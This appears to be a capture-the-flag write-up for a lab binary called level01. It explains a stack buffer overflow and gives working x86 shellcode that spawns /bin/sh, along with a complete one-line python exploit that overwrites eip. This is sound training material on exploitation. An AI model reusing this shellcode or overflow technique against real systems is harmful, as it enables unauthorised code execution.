20 lines
1.9 KiB
Plaintext
20 lines
1.9 KiB
Plaintext
# Level01
|
|
|
|
Using ghidra, we can decompile the code and see that it fills a global buffer of 100 bytes using `fgets()`.
|
|
This buffer will then be passed to a function returning false if it equals to `"dat_wil"`, allowing us to go through the second part of the code.
|
|
Now comes the real part. There is a second `fgets()` on another buffer, a local buffer this time. The difference here is that the buffer is non-secure (the first one smh never crashes with the overflow) and we can modify `eip` register to whatever value we want.
|
|
To exploit this vulnerability, we are going to use both buffers.
|
|
First, we need to write `"dat_wil"` in the first `fgets()`, so that we access to the rest of the code. Second, we're going to write a shell code injection in that same buffer, after `"dat_wil"`. Finally, we will overflow the second buffer (with the call to `fgets()`) and write the address of the first buffer (+7 bytes, for the string at the beginning of the first buffer) to`eip`.
|
|
To get `eip`'s address, we use (this tool)[https://wiremask.eu/tools/buffer-overflow-pattern-generator/] that will calculate the offset between our buffer and `eip` (since it causes a segfault when overwriting it with random values).
|
|
Let's build our exploit in 4 parts:
|
|
- `"dat_wil"` => the required string to get the 2nd call to `fgets()`
|
|
- `"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80"` => the shell code injection
|
|
Print a `"\n"` to exit the first `fgets()`
|
|
- `"A"*80` => fill the buffer until `eip`
|
|
- `"\x47\xa0\x04\x08"` => the address of our shell code injection (addr of `a_user_name` + 7)
|
|
Print a `"\n"` to exit the second `fgets()`
|
|
|
|
Here is the full exploit:
|
|
`(python -c 'print "dat_wil" + "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80" + "\n" + "A"*80 + "\x47\xa0\x04\x08" + "\n"'; cat) | ./level01`
|
|
|